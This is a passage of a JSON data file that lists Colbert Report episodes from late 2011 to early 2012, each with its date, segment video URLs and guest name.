        "http://thecolbertreport.cc.com/videos/nw0vtw/this-weak-in-national-secowardty",
        "http://thecolbertreport.cc.com/videos/dhg1or/martin-luther-king-jr--memorial-paraphrase",
        "http://thecolbertreport.cc.com/videos/796niz/parry-with-an-a-gate----day-26---update",
        "http://thecolbertreport.cc.com/videos/h8ndj7/robin-wright",
        "http://thecolbertreport.cc.com/videos/we0bnb/sign-off---stephen-uses-his-ipad"
      ],
      "guest": "Robin B. Wright"
    },
    {
      "date": "2011-09-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6ut02o/republican-presidential-debate-media-coverage",
        "http://thecolbertreport.cc.com/videos/0yghln/rick-perry-presents",
        "http://thecolbertreport.cc.com/videos/pf00vn/barack-obama-s-jobs-speech",
        "http://thecolbertreport.cc.com/videos/5x0a3c/tom-brokaw",
        "http://thecolbertreport.cc.com/videos/lwsx3m/sign-off---old-milwaukee-beer"
      ],
      "guest": "Tom Brokaw"
    },
    {
      "date": "2011-09-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ooncl/tea-party-face-off-preview",
        "http://thecolbertreport.cc.com/videos/4ig8mh/stephen-reports-on-an-old-fashioned-hero",
        "http://thecolbertreport.cc.com/videos/eicjwv/shopping-griefportunities",
        "http://thecolbertreport.cc.com/videos/sxy47f/diane-sawyer",
        "http://thecolbertreport.cc.com/videos/g2jfq9/sign-off---stephen-s-mug"
      ],
      "guest": "Diane Sawyer"
    },
    {
      "date": "2011-09-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bgo24q/intro---9-13-11",
        "http://thecolbertreport.cc.com/videos/6jpgl3/cnn-tea-party-republican-debate",
        "http://thecolbertreport.cc.com/videos/swyrcg/barack-obama-s-american-jobs-act",
        "http://thecolbertreport.cc.com/videos/q1hw3n/barack-obama-s-american-jobs-act---paul-krugman",
        "http://thecolbertreport.cc.com/videos/t7gpb8/ron-paul-2012",
        "http://thecolbertreport.cc.com/videos/2cr39e/al-gore",
        "http://thecolbertreport.cc.com/videos/e1gewo/sign-off----stephen-colbert-"
      ],
      "guest": "Al Gore"
    },
    {
      "date": "2011-09-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/thyhg7/jobs-bill-clipgate",
        "http://thecolbertreport.cc.com/videos/gvt0ij/return-to-sender",
        "http://thecolbertreport.cc.com/videos/3h08e2/return-to-sender---phil-rubio",
        "http://thecolbertreport.cc.com/videos/gz48mn/rick-perry-s-hpv-vaccine-mandate",
        "http://thecolbertreport.cc.com/videos/dx27ks/michael-moore",
        "http://thecolbertreport.cc.com/videos/3rxw2x/sign-off---goodnight"
      ],
      "guest": "Michael Moore"
    },
    {
      "date": "2011-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jgxmci/intro---9-15-11",
        "http://thecolbertreport.cc.com/videos/rte3k7/take-a-billion--leave-a-billion",
        "http://thecolbertreport.cc.com/videos/15vhbi/the-other-american-jobs-act",
        "http://thecolbertreport.cc.com/videos/rje3k2/jimmy-fallon---stephen-reminisce",
        "http://thecolbertreport.cc.com/videos/h90n13/fema-s-waffle-house-index",
        "http://thecolbertreport.cc.com/videos/b406bd/david-copperfield",
        "http://thecolbertreport.cc.com/videos/7m5lpn/sign-off---stephen-s-magic-trick"
      ],
      "guest": "David Copperfield"
    },
    {
      "date": "2011-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tpoc1g/the-63rd-emmy-awards",
        "http://thecolbertreport.cc.com/videos/whouap/barack-obama-unveils-the--buffett-rule-",
        "http://thecolbertreport.cc.com/videos/pyq49u/the-word---death-and-taxes",
        "http://thecolbertreport.cc.com/videos/3q875w/the-gayest-penetration",
        "http://thecolbertreport.cc.com/videos/xnvm51/jeffrey-kluger",
        "http://thecolbertreport.cc.com/videos/t0vjb4/sign-off---colbert-nation-s-newest-members"
      ],
      "guest": "Jeffrey Kluger"
    },
    {
      "date": "2011-09-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hc8ova/intro---9-21-11",
        "http://thecolbertreport.cc.com/videos/negwpt/coming-soon---hour-long-radiohead-special",
        "http://thecolbertreport.cc.com/videos/kyxdz3/european-union-collapse---war-fueled-recovery",
        "http://thecolbertreport.cc.com/videos/t51ow7/european-union-collapse---war-fueled-recovery---chrystia-freeland",
        "http://thecolbertreport.cc.com/videos/wvyk91/wall-street-under-siege",
        "http://thecolbertreport.cc.com/videos/z0celp/daniel-yergin",
        "http://thecolbertreport.cc.com/videos/y9o1cm/sign-off---cigar"
      ],
      "guest": "Daniel Yergin"
    },
    {
      "date": "2011-09-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9dc7h4/defunct-satellite-hurtles-toward-earth",
        "http://thecolbertreport.cc.com/videos/szcqls/tip-wag---marine-corps---department-of-homeland-security",
        "http://thecolbertreport.cc.com/videos/6uyhy5/obama-s-u-n--gaffes---rick-perry-s-support-for-israel",
        "http://thecolbertreport.cc.com/videos/ncny69/jeremy-ben-ami",
        "http://thecolbertreport.cc.com/videos/akoxfi/sign-off---the-beloved-dog-lives-on"
      ],
      "guest": "Jeremy Ben-Ami"
    },
    {
      "date": "2011-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1w32i4/intro---9-26-11",
        "http://thecolbertreport.cc.com/videos/p9c0ds/dr-pepper-presents-stephen-colbert-s-rocktember-with-radiohead",
        "http://thecolbertreport.cc.com/videos/u4qbft/the-word---i-think--therefore-i-brand",
        "http://thecolbertreport.cc.com/videos/grlcgn/radiohead",
        "http://thecolbertreport.cc.com/videos/xqeu3w/ignoring-global-warming",
        "http://thecolbertreport.cc.com/videos/wwvu7o/ignoring-global-warming---thom-yorke---ed-o-brien"
      ],
      "guest": "Radiohead"
    },
    {
      "date": "2011-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9qb4vy/stephen---melinda-gates-foundation---donorschoose-org",
        "http://thecolbertreport.cc.com/videos/tsm4sg/rick-perry-s-debate-gaffe---arizona-s-primary-date",
        "http://thecolbertreport.cc.com/videos/5mvmay/sport-report---nascar-s-green-initiatives---nfl-pat-downs",
        "http://thecolbertreport.cc.com/videos/ptxagr/melinda-gates",
        "http://thecolbertreport.cc.com/videos/zlthc8/sign-off---beer-from-the-beerkenstocks"
      ],
      "guest": "Melinda Gates"
    },
    {
      "date": "2011-09-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3qibl4/intro---9-28-11",
        "http://thecolbertreport.cc.com/videos/udzuyb/george-clooney-s-villa-parties",
        "http://thecolbertreport.cc.com/videos/tbuq71/the-word---labor-chains",
        "http://thecolbertreport.cc.com/videos/3qmkez/atone-phone---john-lithgow-calls",
        "http://thecolbertreport.cc.com/videos/ndmtp9/ken-burns",
        "http://thecolbertreport.cc.com/videos/osmia6/sign-off---reading---shofar-playing"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2011-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0agwtq/mark-cuban-dances",
        "http://thecolbertreport.cc.com/videos/ivvzeu/colbert-super-pac---ham-rove-s-secrets",
        "http://thecolbertreport.cc.com/videos/3yzu4u/colbert-super-pac---trevor-potter---stephen-s-shell-corporation",
        "http://thecolbertreport.cc.com/videos/ujyuht/colbert-super-pac-shh----the-donating-game",
        "http://thecolbertreport.cc.com/videos/qiwg3k/mark-cuban",
        "http://thecolbertreport.cc.com/videos/8ekdsc/sign-off---last-heroe--crawl"
      ],
      "guest": "Mark Cuban"
    },
    {
      "date": "2011-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fehwjq/rick-perry-s-questionably-named-hunting-camp",
        "http://thecolbertreport.cc.com/videos/m272fc/supreme-courting-season",
        "http://thecolbertreport.cc.com/videos/v2njjc/supreme-courting-season---jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/25ffk2/threatdown---bears-in-rehab--bear-terminators---sanctimonious-enviro-bears",
        "http://thecolbertreport.cc.com/videos/wmazj5/jerome-groopman",
        "http://thecolbertreport.cc.com/videos/kp6658/sign-off---stephen-s-water-bottle"
      ],
      "guest": "Jerome Groopman"
    },
    {
      "date": "2011-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wy82eg/intro---10-4-11",
        "http://thecolbertreport.cc.com/videos/3wq74s/chris-christie-2012",
        "http://thecolbertreport.cc.com/videos/3dpzet/chris-christie-2012---rick-davis",
        "http://thecolbertreport.cc.com/videos/cwuy2m/bocephus-s-eternal-question",
        "http://thecolbertreport.cc.com/videos/xhc68w/john-lithgow",
        "http://thecolbertreport.cc.com/videos/n16lxn/sign-off---formula-401-rumors"
      ],
      "guest": "John Lithgow"
    },
    {
      "date": "2011-10-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0vn7mh/intro---10-5-11",
        "http://thecolbertreport.cc.com/videos/xnxfq5/herman-cain-2012",
        "http://thecolbertreport.cc.com/videos/dbbjic/herman-cain-2012---gay-choice",
        "http://thecolbertreport.cc.com/videos/6kkk93/tip-wag---mexico-city-marriage-licenses---modern-warfare-3-s-xp-promotion",
        "http://thecolbertreport.cc.com/videos/ifegp7/talib-kweli---yasiin-bey--a-k-a--mos-def-",
        "http://thecolbertreport.cc.com/videos/7edjef/sign-off---iphone-goodnight"
      ],
      "guest": "Mos Def & Talib Kweli"
    },
    {
      "date": "2011-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0qyxlz/colbert-super-pac-ad---foul-balls",
        "http://thecolbertreport.cc.com/videos/fri8e1/intro---10-6-11",
        "http://thecolbertreport.cc.com/videos/z103m6/sarah-palin-s-sad-news",
        "http://thecolbertreport.cc.com/videos/yarfv2/colbert-super-pac-shh----apology-to-ham-rove",
        "http://thecolbertreport.cc.com/videos/fottda/tribute-to-steve-jobs",
        "http://thecolbertreport.cc.com/videos/98xl59/jason-amerine",
        "http://thecolbertreport.cc.com/videos/oy1k9u/sign-off---goodnight"
      ],
      "guest": "Jason Amerine"
    },
    {
      "date": "2011-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nng5h7/exclusive---harry-belafonte-extended-interview",
        "http://thecolbertreport.cc.com/videos/gj3y6l/occupy-wall-street-spreads",
        "http://thecolbertreport.cc.com/videos/z27tp0/the-word---look-out-for-the-little-guy",
        "http://thecolbertreport.cc.com/videos/6vl2zq/sport-report---nba-lockout---colbert-super-pac-ad",
        "http://thecolbertreport.cc.com/videos/01fxlb/harry-belafonte",
        "http://thecolbertreport.cc.com/videos/s0qu24/sign-off---goodnight"
      ],
      "guest": "Harry Belafonte"
    },
    {
      "date": "2011-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h40j2n/talking-iphone-4s",
        "http://thecolbertreport.cc.com/videos/ta7e7u/herman-cain-s-electrified-fence",
        "http://thecolbertreport.cc.com/videos/cbwqbb/thought-for-food---school-potato-guidelines---fast-food-stamps",
        "http://thecolbertreport.cc.com/videos/3h8h2l/steven-pinker",
        "http://thecolbertreport.cc.com/videos/9c1bsf/sign-off---sixth-anniversary-portrait"
      ],
      "guest": "Steven Pinker"
    },
    {
      "date": "2011-10-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iirczx/intro---10-19-11",
        "http://thecolbertreport.cc.com/videos/gghhza/herman-cain-canes-the-unemployed",
        "http://thecolbertreport.cc.com/videos/ubi151/job-killing-epa",
        "http://thecolbertreport.cc.com/videos/zi48pt/job-killing-epa---carol-browner",
        "http://thecolbertreport.cc.com/videos/f49qpp/rush-limbaugh-s-l-r-a--research",
        "http://thecolbertreport.cc.com/videos/fztuzs/ali-soufan",
        "http://thecolbertreport.cc.com/videos/kodm5a/sign-off---laptop-music"
      ],
      "guest": "Ali Soufan"
    },
    {
      "date": "2011-10-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n73wq4/intro---10-20-11",
        "http://thecolbertreport.cc.com/videos/5p2a33/goodbye--muammar-al-gaddafi",
        "http://thecolbertreport.cc.com/videos/5xgc3k/tip-wag---tea-party-nation-pledge---spirit-airlines--ad-revenue",
        "http://thecolbertreport.cc.com/videos/ql433h/bill-o-reilly-s--pinheads---patriots-",
        "http://thecolbertreport.cc.com/videos/qw2pao/chris-martin"
      ],
      "guest": "Coldplay"
    },
    {
      "date": "2011-10-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x027jm/exclusive---colbert-super-pac---frank-luntz---stephen-knows-his-classic-rock",
        "http://thecolbertreport.cc.com/videos/f8t1zf/america-s-top-mormons---jon-huntsman",
        "http://thecolbertreport.cc.com/videos/45wqla/colbert-super-pac----corporations-are-people-",
        "http://thecolbertreport.cc.com/videos/6s8sdq/colbert-super-pac----corporations-are-people----frank-luntz",
        "http://thecolbertreport.cc.com/videos/5jjhhv/colbert-super-pac----corporations-are-people----frank-luntz-s-focus-group",
        "http://thecolbertreport.cc.com/videos/541ucf/jon-huntsman",
        "http://thecolbertreport.cc.com/videos/53t2yg/sign-off---goodnight"
      ],
      "guest": "Jon Huntsman"
    },
    {
      "date": "2011-10-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s25oo4/intro---10-25-11",
        "http://thecolbertreport.cc.com/videos/darfes/steve-jobs--biography",
        "http://thecolbertreport.cc.com/videos/3uz7qn/herman-cain-s-campaign-ad",
        "http://thecolbertreport.cc.com/videos/n2dzu0/flogging-the-americone-dream",
        "http://thecolbertreport.cc.com/videos/wsqtx0/susan-saladoff",
        "http://thecolbertreport.cc.com/videos/89ebii/sign-off---enjoying-americone-dream"
      ],
      "guest": "Susan Saladoff"
    },
    {
      "date": "2011-10-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lj5z4k/colbert-super-pac-ad---ball-gag",
        "http://thecolbertreport.cc.com/videos/xlwljf/exclusive---hey--remember-this--alabama-",
        "http://thecolbertreport.cc.com/videos/fa0w0c/intro---10-26-11",
        "http://thecolbertreport.cc.com/videos/zwe40u/whales-aren-t-people",
        "http://thecolbertreport.cc.com/videos/7rtf6k/alabama-s-migrant-workers",
        "http://thecolbertreport.cc.com/videos/dcq3ky/war-on-halloween---costume-swapping---jesus-ween",
        "http://thecolbertreport.cc.com/videos/sqeewv/taylor-branch",
        "http://thecolbertreport.cc.com/videos/6twlww/sign-off---don-t-buy-these-books"
      ],
      "guest": "Taylor Branch"
    },
    {
      "date": "2011-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hfaq0j/intro---10-27-11",
        "http://thecolbertreport.cc.com/videos/gmesd4/shockupy-wall-street-fad",
        "http://thecolbertreport.cc.com/videos/xhn542/sport-report---nfl-fines---colbert-super-pac-s-second-nba-lockout-ad",
        "http://thecolbertreport.cc.com/videos/s2ax4o/toby-keith"
      ],
      "guest": "Toby Keith"
    },
    {
      "date": "2011-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l7lj84/sexy-costume-discrimination",
        "http://thecolbertreport.cc.com/videos/0svkvx/colbert-super-pac---occupy-wall-street-co-optportunity",
        "http://thecolbertreport.cc.com/videos/d4hmi3/colbert-super-pac---stephen-colbert-occupies-occupy-wall-street-pt--1",
        "http://thecolbertreport.cc.com/videos/4tqlz9/tip-wag---gun-freedom---healthcare-bartering",
        "http://thecolbertreport.cc.com/videos/n0jrmj/neil-macgregor",
        "http://thecolbertreport.cc.com/videos/tyvfoe/sign-off---goodnight"
      ],
      "guest": "Neil MacGregor"
    },
    {
      "date": "2011-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9346zn/intro---11-1-11",
        "http://thecolbertreport.cc.com/videos/ysh9bq/herman-cain-under-attack",
        "http://thecolbertreport.cc.com/videos/hqjgoz/colbert-super-pac---stephen-colbert-occupies-occupy-wall-street-pt--2",
        "http://thecolbertreport.cc.com/videos/yo2avl/yo-yo-ma--stuart-duncan--edgar-meyer---chris-thile",
        "http://thecolbertreport.cc.com/videos/pez22q/sign-off---goodnight"
      ],
      "guest": "Yo-Yo Ma"
    },
    {
      "date": "2011-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/394xx1/intro---11-2-11",
        "http://thecolbertreport.cc.com/videos/n3ifbc/herman-cain-s-international-affairs",
        "http://thecolbertreport.cc.com/videos/icx1x6/the-word---bite-the-hand-that-feeds-you",
        "http://thecolbertreport.cc.com/videos/6dlo6v/muffingate",
        "http://thecolbertreport.cc.com/videos/6jv4ha/michael-pollan",
        "http://thecolbertreport.cc.com/videos/c8yk04/sign-off---white-castle---beer"
      ],
      "guest": "Michael Pollan"
    },
    {
      "date": "2011-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/db8sp6/intro---11-3-11",
        "http://thecolbertreport.cc.com/videos/tvwydl/ghost-sex",
        "http://thecolbertreport.cc.com/videos/gxg7x0/european-investment-prospectus",
        "http://thecolbertreport.cc.com/videos/2nhcbh/colbert-super-pac---herman-cain-s-fundraising---rush-limbaugh-s-stereotypes",
        "http://thecolbertreport.cc.com/videos/rwwdgv/nathan-wolfe",
        "http://thecolbertreport.cc.com/videos/g7b66l/sign-off---purell"
      ],
      "guest": "Nathan Wolfe"
    },
    {
      "date": "2011-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/px6doe/colbert-super-pac---issue-ads",
        "http://thecolbertreport.cc.com/videos/otywae/colbert-super-pac---issue-ads---trevor-potter",
        "http://thecolbertreport.cc.com/videos/6nuhjw/blood-in-the-water---larry-taylor-s-anti-semitic-slur",
        "http://thecolbertreport.cc.com/videos/xisem8/niall-ferguson",
        "http://thecolbertreport.cc.com/videos/e9gc1y/sign-off---goodnight"
      ],
      "guest": "Niall Ferguson"
    },
    {
      "date": "2011-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m4n0nh/herman-cain-won-t-be-stopped",
        "http://thecolbertreport.cc.com/videos/yk540u/colbert-platinum---wealth-under-siege",
        "http://thecolbertreport.cc.com/videos/3krrxg/the-blitzkrieg-on-grinchitude---fired-santa-claus---colbert-super-pac-christmas",
        "http://thecolbertreport.cc.com/videos/s4sqap/seth-meyers",
        "http://thecolbertreport.cc.com/videos/fz9les/sign-off---custom-escape-yacht"
      ],
      "guest": "Seth Meyers"
    },
    {
      "date": "2011-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qc00ca/intro---11-9-11",
        "http://thecolbertreport.cc.com/videos/gs7ppt/herman-cain-s-democrat-conspiracy",
        "http://thecolbertreport.cc.com/videos/e94bhi/the-word---bully-pulpit",
        "http://thecolbertreport.cc.com/videos/v1f4n3/americone-dream-of-the-future",
        "http://thecolbertreport.cc.com/videos/3k5pcf/james-martin",
        "http://thecolbertreport.cc.com/videos/9mrd4k/sign-off---feeding-jimmy-fallon-s-portrait"
      ],
      "guest": "Father Jim Martin"
    },
    {
      "date": "2011-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qfc9xd/shock---aussie",
        "http://thecolbertreport.cc.com/videos/pg0q9t/rick-perry-s-sorry--oops",
        "http://thecolbertreport.cc.com/videos/g1tcu5/occupy-u-c--berkeley",
        "http://thecolbertreport.cc.com/videos/4vt0hx/brian-eno"
      ],
      "guest": "Brian Eno"
    },
    {
      "date": "2011-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ufww4s/intro---11-14-11",
        "http://thecolbertreport.cc.com/videos/3zodum/cbs-snubs-michele-bachmann",
        "http://thecolbertreport.cc.com/videos/5vb30b/keystone-xl-oil-pipeline---bill-mckibben",
        "http://thecolbertreport.cc.com/videos/hu2y6t/vodka-tampons",
        "http://thecolbertreport.cc.com/videos/uoo5c0/thomas-thwaites",
        "http://thecolbertreport.cc.com/videos/9x16t1/sign-off---leaf-blower"
      ],
      "guest": "Thomas Thwaites"
    },
    {
      "date": "2011-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c73ioe/occupy-wall-street-decamped",
        "http://thecolbertreport.cc.com/videos/qzjgvi/difference-makers---jimmy-justice",
        "http://thecolbertreport.cc.com/videos/ufsd5o/bears---balls---celebrity-relics---gooooooold-",
        "http://thecolbertreport.cc.com/videos/f1tu06/elijah-wood",
        "http://thecolbertreport.cc.com/videos/0vuu1j/sign-off---one-ring"
      ],
      "guest": "Elijah Wood"
    },
    {
      "date": "2011-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/znljdd/intro---11-16-11",
        "http://thecolbertreport.cc.com/videos/ukaw6z/newt-gingrich-s-greek-cruise",
        "http://thecolbertreport.cc.com/videos/6dwdiy/tip-wag---pin-ups-for-ron-paul--movie-torture-tactics---offensive-merchandise",
        "http://thecolbertreport.cc.com/videos/z9qeks/elderly-occupier-pepper-sprayed",
        "http://thecolbertreport.cc.com/videos/94gywl/chris-matthews",
        "http://thecolbertreport.cc.com/videos/aekw8v/colbert-report-bedtime-stories---dragon---wizard"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2011-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hnwps8/intro---11-17-11",
        "http://thecolbertreport.cc.com/videos/41apq9/people-magazine-s-sexiest-man-alive-2011",
        "http://thecolbertreport.cc.com/videos/wdsxo5/the-word---the-1-",
        "http://thecolbertreport.cc.com/videos/h76098/thought-for-food---pushy-pops",
        "http://thecolbertreport.cc.com/videos/y88hzi/susan-orlean",
        "http://thecolbertreport.cc.com/videos/8d1q2a/sign-off---shout-out-to-the-black-belles"
      ],
      "guest": "Susan Orlean"
    },
    {
      "date": "2011-11-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/no4xhk/intro---11-28-11",
        "http://thecolbertreport.cc.com/videos/58ikdq/violent-black-friday",
        "http://thecolbertreport.cc.com/videos/h84vbf/tip-wag---barack-obama-s-omission--mitt-romney-s-ad---lululemon-s-tagline",
        "http://thecolbertreport.cc.com/videos/qggo98/stephen-colbert-s-mereporters",
        "http://thecolbertreport.cc.com/videos/ut1g77/siddhartha-mukherjee",
        "http://thecolbertreport.cc.com/videos/np8x21/sign-off---macbook"
      ],
      "guest": "Siddhartha Mukherjee"
    },
    {
      "date": "2011-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/92ekqe/intro---11-29-11",
        "http://thecolbertreport.cc.com/videos/fafzt9/he-said--she-said--she-said--she-said--she-said--she-was-paid-not-to-say",
        "http://thecolbertreport.cc.com/videos/r8p3nn/yahweh-or-no-way---altered-catholic-mass--papal-seat-belt---offensive-vodka-ad",
        "http://thecolbertreport.cc.com/videos/4dohxr/tinariwen-with-kyp-malone---tunde-adebimpe",
        "http://thecolbertreport.cc.com/videos/9nbfru/sign-off---tinariwen--album"
      ],
      "guest": "Tinariwen"
    },
    {
      "date": "2011-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fc3loc/newt-gingrich-denies-lobbying",
        "http://thecolbertreport.cc.com/videos/akure9/barney-frank-s-retirement",
        "http://thecolbertreport.cc.com/videos/d0x6zg/better-know-a-district---massachusetts--4th---barney-frank-update",
        "http://thecolbertreport.cc.com/videos/j1oeb0/conservative-siri",
        "http://thecolbertreport.cc.com/videos/okgz78/stephen-sondheim",
        "http://thecolbertreport.cc.com/videos/ga76kd/sign-off---goodnight"
      ],
      "guest": "Stephen Sondheim"
    },
    {
      "date": "2011-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eclhxy/in-herman-cain-s-defense",
        "http://thecolbertreport.cc.com/videos/70sj7m/stop-online-piracy-act",
        "http://thecolbertreport.cc.com/videos/nmrgz9/stop-online-piracy-act---danny-goldberg---jonathan-zittrain",
        "http://thecolbertreport.cc.com/videos/pzi69s/mitt-romney-gets-testy",
        "http://thecolbertreport.cc.com/videos/pmypbg/richard-branson",
        "http://thecolbertreport.cc.com/videos/rhwqc7/sign-off---fire-extinguishing-powder"
      ],
      "guest": "Richard Branson"
    },
    {
      "date": "2011-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yy5x27/2011-kennedy-center-honors",
        "http://thecolbertreport.cc.com/videos/xn3r3g/mysteries-of-the-ancient-unknown---2012-end-of-times",
        "http://thecolbertreport.cc.com/videos/f2zdhx/herman-cain-drops-out",
        "http://thecolbertreport.cc.com/videos/dt8216/jimmie-johnson",
        "http://thecolbertreport.cc.com/videos/0ewfq6/sign-off---slow-motion-race-replay"
      ],
      "guest": "Jimmie Johnson"
    },
    {
      "date": "2011-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1o3huj/american-drone-in-iran",
        "http://thecolbertreport.cc.com/videos/fcu2h2/donald-s-trumptacular---stephen-s-south-carolina-serious--classy-republican-debate",
        "http://thecolbertreport.cc.com/videos/dphj6u/the-black-keys",
        "http://thecolbertreport.cc.com/videos/4t05a5/sign-off---glenn-eichler-s-graphic-novel"
      ],
      "guest": "The Black Keys"
    },
    {
      "date": "2011-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5kfnqe/stephen-colbert-s-south-carolina-serious--classy-republican-debate---save-the-date",
        "http://thecolbertreport.cc.com/videos/h7qfup/colbert-super-pac---stephen-s-south-carolina-referendum",
        "http://thecolbertreport.cc.com/videos/6dds1t/colbert-super-pac---stephen-s-south-carolina-referendum---dick-harpootlian",
        "http://thecolbertreport.cc.com/videos/c66w64/jon-huntsman-sr--s-ad-buy",
        "http://thecolbertreport.cc.com/videos/pueyvf/david-hallberg"
      ],
      "guest": "David Hallberg"
    },
    {
      "date": "2011-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/08g4y6/intro---12-8-11",
        "http://thecolbertreport.cc.com/videos/sd4lua/michigan-s-snow-cone-machines",
        "http://thecolbertreport.cc.com/videos/lbdchz/cheating-death---chicken-pox-lollipops---fecal-transplants",
        "http://thecolbertreport.cc.com/videos/3d10i3/rick-perry-s-pro-christmas-ad",
        "http://thecolbertreport.cc.com/videos/ovws10/jack-abramoff",
        "http://thecolbertreport.cc.com/videos/gt2hau/sign-off---goodnight"
      ],
      "guest": "Jack Abramoff"
    },
    {
      "date": "2011-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iu3gnx/intro---12-12-11",
        "http://thecolbertreport.cc.com/videos/52a05g/christmas-cram",
        "http://thecolbertreport.cc.com/videos/zuufyt/tip-wag---liberal-dictionary---newt-gingrich-alert",
        "http://thecolbertreport.cc.com/videos/qv9fb0/norway-s-butter-shortage",
        "http://thecolbertreport.cc.com/videos/kx2u80/samuel-l--jackson",
        "http://thecolbertreport.cc.com/videos/v6sdfa/sign-off---merry-christmas"
      ],
      "guest": "Samuel L. Jackson"
    },
    {
      "date": "2011-12-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rwb03h/intro---12-13-11",
        "http://thecolbertreport.cc.com/videos/7zgxss/trump-s-cancellation---stephen-s-south-carolina-serious--classy-re-announcement",
        "http://thecolbertreport.cc.com/videos/frhjj0/the-word---let-them-buy-cake",
        "http://thecolbertreport.cc.com/videos/flxy99/anderson-cooper-s-phallus-party-accusation",
        "http://thecolbertreport.cc.com/videos/sn7cpj/mark-whitaker",
        "http://thecolbertreport.cc.com/videos/eswjdg/sign-off---goodnight"
      ],
      "guest": "Mark Whitaker"
    },
    {
      "date": "2011-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/18wgz1/stephen-colbert-s-south-carolina-serious--classy-debate---nat-geo-wild-s-response",
        "http://thecolbertreport.cc.com/videos/khf3hx/christine-o-donnell-s-endorsement",
        "http://thecolbertreport.cc.com/videos/vg9vdy/stephen-colbert-s-big-gay-roundup---military-bestiality---homosexual-penguins",
        "http://thecolbertreport.cc.com/videos/qvom30/tv-hat",
        "http://thecolbertreport.cc.com/videos/lqslc3/ray-odierno"
      ],
      "guest": "Gen. Raymond Odierno"
    },
    {
      "date": "2011-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8900sr/stephen-colbert-s-south-carolina-serious--classy-republican-debate---network-battle",
        "http://thecolbertreport.cc.com/videos/dwccb9/the-blitzkrieg-on-grinchitude---department-store-cutbacks---gun-filled-christmas",
        "http://thecolbertreport.cc.com/videos/9ugow2/fox-news--mitt-romney-photo-flub",
        "http://thecolbertreport.cc.com/videos/iqj0p8/daniel-craig",
        "http://thecolbertreport.cc.com/videos/tri39n/2011-goodbye"
      ],
      "guest": "Daniel Craig"
    }
  ],
  "2012": [
    {
      "date": "2012-01-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9u9qx6/iowa-caucus-2012",
        "http://thecolbertreport.cc.com/videos/yx6r23/iowa-caucus---caucus-goer-s-choice",
        "http://thecolbertreport.cc.com/videos/5mqn59/iowa-caucus---megyn-shelly-s-prediction",
        "http://thecolbertreport.cc.com/videos/qx2w8n/kim-jong-il---in-memoriam",
        "http://thecolbertreport.cc.com/videos/ioguwl/bernie-sanders",
        "http://thecolbertreport.cc.com/videos/4ob0g2/sign-off---megyn-shelly"
      ],
      "guest": "Sen. Bernie Sanders"
    },
    {
      "date": "2012-01-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8am6m/iowa-caucus---mitt-romney-s-victory-speech---rick-santorum-s-coup",
        "http://thecolbertreport.cc.com/videos/m762nz/iowa-caucus---not-mitt-romney-s-super-pac",
        "http://thecolbertreport.cc.com/videos/x195wh/iowa-caucus---cable-news-coverage",
        "http://thecolbertreport.cc.com/videos/61k2nf/iowa-caucus---woi-in-des-moines-reports",
        "http://thecolbertreport.cc.com/videos/1ja4vs/john-heilemann",
        "http://thecolbertreport.cc.com/videos/xyq4st/sign-off---erin-burnett-pong"
      ],
      "guest": "John Heilemann"
    },
    {
      "date": "2012-01-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8t37qs/intro---1-5-12",
        "http://thecolbertreport.cc.com/videos/js72my/fun-rick-santorum",
        "http://thecolbertreport.cc.com/videos/5xw4yi/the-word---catch-2012",
        "http://thecolbertreport.cc.com/videos/sjbolu/god-s-message-to-pat-robertson",
        "http://thecolbertreport.cc.com/videos/lgtesz/steve-case",
